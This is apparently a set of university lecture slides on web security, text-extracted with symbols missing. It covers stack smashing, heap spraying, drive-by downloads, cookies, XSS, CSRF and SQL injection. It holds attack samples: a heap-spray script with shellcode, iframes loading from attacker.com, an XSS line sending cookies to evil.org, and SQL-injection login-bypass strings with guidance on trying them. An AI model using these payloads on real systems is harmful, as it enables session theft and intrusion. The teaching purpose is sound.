Web Security

1

• Web Security
• Dr. ? ? ?
• Department of Computer Science and Information
  Engineering,National Central University

2

• Stack Smashing Attacks

3
Principle of Stack Smashing Attacks

• Overwritten control transfer structures, such as
  return addresses or function pointers, to
  redirect program execution flow to desired code.
• Attack strings carry both code and address(es) of
  the code entry point.

4
A Linux Process Layout and Stack Operations
kernel address space
high address
main() G(1) void G(int a)
H(3) void H(int c)
Libraries heap BSS data code
env, argv, argc
main
stack
G
H
low address
5
Explanation of BOAs (1)
G(int a) H(3) add_g H( int b) char
c100 int i0 while((cigetch())!EOF
)
Gs stack frame
b
return address add_g
Hs stack frame
address of Gs frame point
ebp
C99
0xabc
c b a
0xabb
C0
0xaba
Input String abc
i
esp
6
Explanation of BOAs (2)
Length108 bytes
Attack String xxInjected Codexy0xabc
G(int a) H(3) add_g H( int b) char
c100 int i0 while((cigetch())!EOF
)
X 1 byte y 4 bytes
b
return address add_g
addrress oxabc
Hs stack frame
address of Gs frame point
y
ebp
C99
x
Injected Code
0xabc
0xabb
x x
C0
0xaba
i
esp
7
Injected Code

• The attacked programs usually have root
  privilege therefore, the injected code is
  executed with root privilege.
• The injected code is already in machine
  instruction form therefore, a CPU can directly
  execute it.
• However the above fact also means that the
  injected code must match the CPU type of the
  attacked host.
• Usually the injected code will fork a shell
  hence, after an attack, an attacker could have a
  root shell.

8

• Heap Spray and Drive-by Download

9
Heap SprayWikipediaNozzle

• Heap spraying is a technique used in exploits to
  facilitate arbitrary code execution.
• Heap spraying is a security threat using a
  strategy of allocating many objects containing
  the attackers exploit code in an applications
  heap.
• Heap spraying requires that an attacker use
  another memory corruption exploit to trigger an
  attack, but the act of spraying greatly
  simplifies the attack and increases its
  likelihood of success.

10
Heap Spray Overview Puttaraksa
11
Implementation - JavaScript

• Heap sprays for web browsers
• are commonly implemented in JavaScript
• and
• spray the heap by
• making copies of a long string
• and
• storing these strings in an array, up to the
  point where enough memory has been sprayed to
  cover the area that the exploit targets.
• P.S. The long string begins with a NOP sled and
  ends with shellcode.

12
Implementation - ActionScript

• ActionScript
• In July 2009, exploits were found to be using
  ActionScript to spray the heap in Adobe Flash.

13
Implementation - Images

• Images
• Though it has been proven that heap-spraying can
  be done through other means, for instance by
  loading image files into the process, this has
  not seen widespread use (as of August 2008).

14

• Memory Corruption Exploit

15
Sources of Memory Corruption Exploit

• Mishandling Tag Attribute Values
• Virtual Table

16
Mishandling Tag Attribute Values (1)

• HTTP MS IE Malf. IFRAME/EMBED BO Symantec
• It is reported that an attacker can exploit this
  condition by creating a malicious Web page
  containing a malformed IFRAME, FRAME or EMBED
  tag.
• Specifically, the attacker creates the IFRAME,
  FRAME or EMBED tag by specifying large string
  values for the 'SRC' and 'NAME' properties.
• These values are copied into finite sized process
  buffers resulting in memory corruption.

17
Mishandling Tag Attribute Values (2)Julam

• ltIFRAME SRCfile//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  BBBBBBBBBBBBBBB
• BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  BBBBBBB
• BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  BBBBBBBB NAMECCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
  CCCCCCCCCCCCCCCC
• CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
  CCCCCgt
• lt/IFRAMEgt
• Result
• eip stops at address 0x769f682f

18
Mishandling Tag Attribute Values (3)Julam

• memory new Array()
• for (i0ilt700i)
• memoryi block shellcode

19
Virtual Table Foster et al.

• The virtual table is a lookup table of functions
  used to resolve function calls in a dynamic/late
  binding manner.
• Class objects and structures are often stored on
  the heap.
• One field of a class object is a pointer to its
  virtual table, called virtual-function table
  pointer.

20
Virtual Table Foster et al. Overview
__vptr
char a100
__vptr
char a100
21
Virtual Table Ratanaworabhan et al. Spraying
the Heap

• ltSCRIPT language"text/javascript"gt
• shellcode unescape("u4343u4343...")
• oneblock unescape("u0D0Du0D0D")
• var fullblock oneblock
• while (fullblock.lengthlt0x40000)
• fullblock fullblock
• sprayContainer new Array()
• for (i0 ilt1000 i)
• sprayContaineri fullblock shellcode
• lt/SCRIPTgt

Shell Code
NOP Sled
22
Result

• Because the size of the sprayed heap area may be
  tens of MBs, ASLR may not work as expected.

23
Drive-by Download Attacks wikipedia

• Download of spyware, a computer virus, or any
  kind of malware that happens without knowledge of
  the user.
• Drive-by downloads may happen by
• visiting a website
• viewing an e-mail message
• or
• by clicking on a deceptive popup window.

24
Clicking on a Deceptive Popup Window

• For instance, a user clicks on the window in the
  mistaken belief
• that it is an error report from his own PC
• or
• that it is an innocuous advertisement popup.
• In such cases, the "supplier" may claim that the
  user "consented" to the download though he was
  completely unaware of having initiated a
  malicious software download.

25
Drive-by Downloads using Web Pages

• Features
• Same appearance as the original webpage
• Secret downloads
• Automatic installation
• Based on vulnerabilities of browsers, plug-ins,
  or OSes

26
Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
ltiframe srchttp//attacker.com/bad.htm
height0 width0gt lt/iframegt ltscript
srchttp//attacker.com/bad.jsgtlt/scriptgt
27
Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
document.write(unescape("3C73637269707420
6C616E67756167653D226A617661736372
697074223E0D0A6966286E61766967617
46F722E757365724167656E742E746F4C
6F7765724361736528292E696E6465784F
6628225C7836445C7837335C78
attacker2.com
28
Discuss

• Why not inject shell code at the first stage?
  (i.e. inject shell code to the good web server
  directly)

29
Drive-by Downloads

• Why Drive-by-Downloads?
• Deploy malware on computers of victims
• Large scale (vs. target attacks)
• Bypass firewalls or NAT protection
• Current solutions
• Static web-page analysis
• Web-sites reputation
• Microsoft Killbit

30

• HTTP Cookie Wikipedia

31
HTTP Cookies

• HTTP cookies, sometimes known as web cookies or
  just cookies, are parcels of text
• sent by a server to a web browser
• and then sent back unchanged by the browser each
  time it accesses that server
• HTTP cookies are used for
• authenticating
• tracking
• maintaining specific information about users,
  such as
• site preferences
• the contents of their electronic shopping carts.
• The term "cookie" is derived from "magic cookie,"
  a well-known concept in Unix computing which
  inspired both the idea and the name of HTTP
  cookies.

32
Cookie Delivery
33
Examine the Cookies

• Most browsers supporting JavaScript allow the
  user to see the cookies that are active with
  respect to a given page by typing
  javascriptalert("Cookies "document.cookie) in
  the browser URL field.
• Some browsers incorporate a cookie manager for
  the user to see and selectively delete the
  cookies currently stored in the browser.

34
Third-party Cookies

• While cookies are only sent to
• the server setting them
• or
• one in the same Internet domain,
• a Web page may contain images or other
  components stored on servers in other domains.
• Cookies that are set during retrieval of these
  components are called third-party cookies.

35
Using Third-party Cookies to Track a Users
Activity

• Advertising companies use third-party cookies to
  track a user across multiple sites.
• In particular, an advertising company can track a
  user across all pages where it has placed
  advertising images or Web bugs.
• Knowledge of the pages visited by a user allows
  the advertisement company to target advertisement
  to the user's presumed preferences.

36
Tracking Example
37
Privacy Threat

• The possibility of building a profile of users
  has been considered by some a potential privacy
  threat,
• even when the tracking is done on a single domain
  
• but especially when tracking is done across
  multiple domains using third-party cookies.
• For the above reason, some countries have
  legislation about cookies.

38

• Cross-site Scripting

39
Categories

• Non-persistent  XSS (Reflected XSS)
• the most common type nowadays
• Persistent XSS

40

• Non-persistent XSS

41
Through Hyperlinks

• An attacker may be able to embed their malicious
  code within a hyperlink to the target site. When
  the client web browser follows the link, the URL
  sent to trusted.org includes malicious code. The
  site (trusted.org) sends a page back to the
  browser including the value of criteria without
  validating user supplied input , which
  consequently forces the execution of code from
  the evil attackers server.
• For example
• ltA HREF"http//trusted.org/search.cgi?criter
  ialtSCRIPT SRC'http//evil.org/badkama.js'gtlt/SCRI
  PTgt"gt Go to trusted.org lt/Agt
• In the attack above, one source is inserting code
  into pages sent by another source.
• It should be noted that this attack disguises
  the link as a link to http//trusted.org, can
  be easily included in an HTML email message,
  does not supply the malicious code inline, but is
  downloaded from
• http//evil.org. Thus the attacker
  retains control of the script and can
• update or remove the exploit code at
  anytime.

Web browser
trusted.org
42
Ways to Deploy Hyperlinks

• The user will most likely click on this link from
  
• another website,
• instant message,
• or
• simply just reading a web board or email message.

43
Non-persistent Cross Site Scripting (XSS)

• A non-persistent cross-site scripting (XSS)
  vulnerability is caused by the failure of an web
  based application to validate user supplied input
  before returning it to the client system.
• By causing the victims browser to execute
  injected code under the same permissions as the
  web application domain, an attacker can bypass
  the traditional Document Object Model (DOM)
  security restrictions which can result in
• cookie theft,
• account hijacking,
• changing of web application account settings,
• spreading of a webmail virus, etc.

44
The Most Common Victims to Non-persistent XSS

• The most common web components that fall victim
  to XSS vulnerabilities include
• CGI scripts,
• search engines,
• interactive bulletin boards,
• and
• custom error pages with poorly written input
  validation routines.
• Additionally, a victim doesnt necessarily have
  to click on a link XSS code can also be made to
  load automatically in an HTML e-mail with certain
  manipulations of the IMG or IFRAME HTML tags.

Each of these components could generate a web
page.
45
Hijack Web Application Sessions

• The most popular XSS attack (and devastating) is
  the harvesting of
• authentication cookies
• and
• session management tokens.
• With this information, it is often a trivial
  exercise for an attacker to hijack the victims
  active session, completely bypassing the
  authentication process.

46
Traditional Non-persistent XSS Web Application
Hijack Scenario (1)

• The attacker investigates an interesting site
• that normal users must authenticate to gain
  access to
• and
• that tracks the authenticated user through the
  use of cookies or session IDs
• The attacker finds a XSS vulnerable page on the
  site, for instance
  http//trusted.org/account.asp.
• Using a little social engineering,
• the attacker creates a special link to the site
• and
• embeds it in an HTML email that he sends to a
  long list of potential victims.

47
Traditional Non-persistent XSS Web Application
Hijack Scenario (2)

• Embedded within the special link are some coding
  elements specially designed to transmit a copy of
  the victims cookie back to the attacker. For
  instance ltimg src"http//trusted.org/account.asp
  ?akltscriptgtdocument.location.replace('http//evil
  .org/steal.cgi?'document.cookie) lt/scriptgt"gt
• Unknown to the victim, the attacker has now
  received a copy of their cookie information.
• The attacker now visits the web site and, by
  substituting his cookie information with that of
  the victims, is now perceived to be the victim by
  the server application.

48
Traditional Non-persistent XSS Web Application
Hijack Steps David Endler
49

• SOLUTIONS AND WORKAROUNDS David Endler

50
For Users

• As a web application user, there are a few ways
  to protect yourself from XSS attacks.
• The first and most effective solution is to
  disable all scripting language support in your
  browser and email reader.
• If this is not a feasible option for business
  reasons, another recommendation is to use
  reasonable caution when clicking links in
  anonymous e-mails and dubious web pages.

51
Web Application Developers and Vendors

• Web application developers and vendors should
  ensure that all user input is parsed and filtered
  properly.
• User input includes
• things stored in GET Query strings,
• POST data,
• Cookies,
• URLs,
• and
• in general any persistent data that is
  transmitted between the browser and web server.

52
User Input Filtering

• The best philosophy to follow regarding user
  input filtering is to deny all but a pre-selected
  element set of benign characters in the web input
  stream.
• This prevents developers from having to
  constantly predict and update all forms of
  malicious input in order to deny only specific
  characters (such as lt ? etc.).
• Some decent guidelines for input filtering can be
  found in the OWASP Requirements document OWASP
  Guide to Building Secure Web Applications and Web
  Services".

53
Test

• Once an application has evolved out of the design
  and development phases, it is important to
  periodically test for XSS vulnerabilities since
  application functionality is constantly changing
  due to
• upgrades
• integration of third party technologies
• decentralized website authoring

54
Vulnerability Web Application Scanners

• Many web application vulnerability scanners start
  to include checks for XSS.
• The OWASP Testing group plans to produce a
  methodology for checking XSS on a web
  application.
• Web Scarab

55
Examples Used to Bypass Being Detected

• XSS Cheat Sheet

56
XSS Tool

• XSS-Proxy

57

• Cross-site Request
• ForgeryWikipedia

58
Definition

• Cross-site request forgery, also known as
  one-click attack or session riding and
  abbreviated as CSRF ("sea-surf") or XSRF, is a
  type of malicious exploit of a website whereby
  unauthorized commands are transmitted from a user
  that the website trusts.

59
Background

• CSRF vulnerabilities have been known and in some
  cases exploited since the 1990s.
• Because it is carried out from the user's IP
  address, CSRF is untraceable without proper
  logging.

60
Impact

• As of 2007 there are few well-documented
  examples.
• About 18 million users of eBay's Internet Auction
  Co. at Auction.co.kr in Korea lost personal
  information in February 2008.
• Customers of a bank in Mexico were attacked in
  early 2008 with an image tag in email.

61
Example

• One user, Bob, might be browsing a chat forum
  where another user, Mallory, has posted a
  message.
• Suppose that Mallory has crafted an HTML image
  element that references a script on Bob's bank's
  website (rather than an image file), e.g.,
• ltimg src"http//bank.example/withdraw?accoun
  tbobamount1000000formallory"gt
• If Bob's bank keeps his authentication
  information in a cookie
• and
• if the cookie hasn't expired,
• then the attempt by Bob's browser to load the
  image will submit the withdrawal form with his
  cookie, thus authorizing a transaction without
  Bob's approval.

62
Common CSRF Characteristics

• Involve sites that rely on a user's identity
• Exploit the site's trust in that identity
• Trick the user's browser into sending HTTP
  requests to a target site
• Involve HTTP requests that have side effects

63
Common CSRF Victims

• At risk are web applications that perform actions
  based on input from trusted and authenticated
  users without requiring the user to authorize the
  specific action.
• A user that is authenticated by a cookie saved in
  his web browser could unknowingly send an HTTP
  request to a site that trusts him and thereby
  cause an unwanted action.

64
Common CSRF Pitfalls

• CSRF attacks using images are often made from
  Internet forums, where users are allowed to post
  images but not JavaScript.

65
CSRF Assumptions

• This attack relies on a few assumptions
• The attacker has knowledge of sites on which the
  victim has current authentication (more common on
  web forums, where this attack is most common)
• The attacker's "target site" has authentication
  cookies, or the victim has a current session
  cookie with the target site
• The "target site" doesn't have secondary
  authentication for actions (such as form tokens)

66
Example

• Assume a script in the document at
  http//store.company.com/dir/other.html
  executes the following statement
• document.domain "company.com"
• After that statement executes, the page would
  pass the origin check with http//company.com/dir/
  page.html.
• However, by the same reasoning, company.com could
  not set document.domain to othercompany.com.

67
Prevention

• For the web site, switching from
• a persistent authentication method (e.g.
  a
• cookie or HTTP authentication)
• to
• a transient authentication method (e.g. a
  hidden
• field provided on every form)
• will help prevent these attacks.
• hidden field of a form
• A similar approach is to include a secret,
  user-specific token in forms that is verified in
  addition to the cookie.
• a field of a form filled out by a user

68

• SQL Injection SK

69
What is SQL Injection?

• Many web pages take parameters from web users,
  and make SQL query to the database.
• Take for instance when a user login a web page,
  the web page accepts that user name and password
  and makes SQL query to the database to check if
  the user has valid name and password.
• With SQL Injection, it is possible for us to send
  crafted user name and/or password field that will
  change the SQL query and thus grant us something
  else.

70
SQL Injection Attack Channels

• SQL injection is one type of web hacking that
  require nothing but port 80 and it might just
  work even if the admin is patch-happy.
• It attacks on the web application (like ASP, JSP,
  PHP, CGI, etc) itself rather than on the web
  server or services running in the OS.

71
What You Should Look for?

• Try to look for pages that allow you to submit
  data, i.e
• login page,
• search page,
• feedback, etc.
• Sometimes, HTML pages use POST command to send
  parameters to another ASP page. Therefore, you
  may not see the parameters in the URL. However,
  you can check the source code of the HTML, and
  look for "FORM" tag in the HTML code. You may
  find something like this in some HTML codes
• ltFORM actionSearch/search.asp
  methodpostgtltinput typehidden nameA
  valueCgtlt/FORMgtEverything between the ltFORMgt
  and lt/FORMgt has potential parameters that might
  be useful (exploit wise).

72
What If You Can't Find Any Page That Takes Input?

• You should look for pages like ASP, JSP, CGI, or
  PHP web pages.
• Try to look especially for URL that takes
  parameters, likehttp//duck/index.asp?id10

73
How Do You Test If It Is Vulnerable?

• Start with a single quote trick. Input something
  likehi' or 11--
• into login, or password, or even in the URL.
• Example  - Login hi' or 11-- - Pass hi' or
  11-- - http//duck/index.asp?idhi' or 11
• If luck is on your side, you will get login
  without any login name or password.

74
Hidden Field

• If you must do this with a hidden field, just
  download the source HTML from the site, save it
  in your hard disk, modify the URL and hidden
  field accordingly.
• ExampleltFORM actionhttp//duck/Search/search.a
  sp methodpostgtltinput typehidden nameA
  value"hi' or 11--"gtlt/FORMgt

75
Database Table ExampleCQU
76
Database Table product
PName PCategory price number bar code
bread food 30 100 100-234-7
cake food 300 20 100-987-6
cookie food 50 70 100-812-9
model car toy 200 20 300-567-7
figure toy 300 80 300-987-9
paper stationery 0.5 5000 981-897-7
pen stationery 20 300 981-967-0
77
Web Application Input and Its Corresponding SQL
Query

• Take an asp page that will link you to another
  page with the following URLhttp//duck/index.as
  p?categoryfoodIn the URL, 'category' is the
  variable name, and 'food' is the value assigned
  to the variable. In order to do that, an ASP
  might contain the following codev_cat
  request("category")sqlstr"SELECT FROM product
  
• WHERE PCategory'" v_cat "'"set
  rsconn.execute(sqlstr)As we can see, our
  variable will be wrapped into v_cat and thus the
  SQL statement should becomeSELECT FROM
  product WHERE PCategory'food'The query should
  return a result set containing one or more rows
  that match the WHERE condition, in this case,
  'food'.

78
Why ' or 11-- ?

• Now, assume that we change the URL into something
  like thishttp//duck/index.asp?categoryfood'
  or 11--Now, our variable v_cat equals to
  "food' or 11-- ", if we substitute this in the
  SQL query, we will have
• SELECT
• FROM product
• WHERE PCategory'food' or 11--'The query
  now should now select everything from the product
  table regardless if PCategory is equal to 'food'
  or not.
• A double dash "--" tell MS SQL server ignore the
  rest of the query, which will get rid of the last
  hanging single quote (').
• Sometimes, it may be possible to replace double
  dash with single hash "".

79
Other Crafted Input (1)

• However, if it is not an SQL server, or you
  simply cannot ignore the rest of the query, you
  also may try' or 'a''aThe SQL query will now
  become
• SELECT
• FROM product
• WHERE PCategory'food' or 'a''a'It should
  return the same result.

80
Other Crafted Input (2)

• Depending on the actual SQL query, you may have
  to try some of these possibilities' or 11--"
  or 11--or 11--' or 'a''a" or "a""a') or
  ('a''a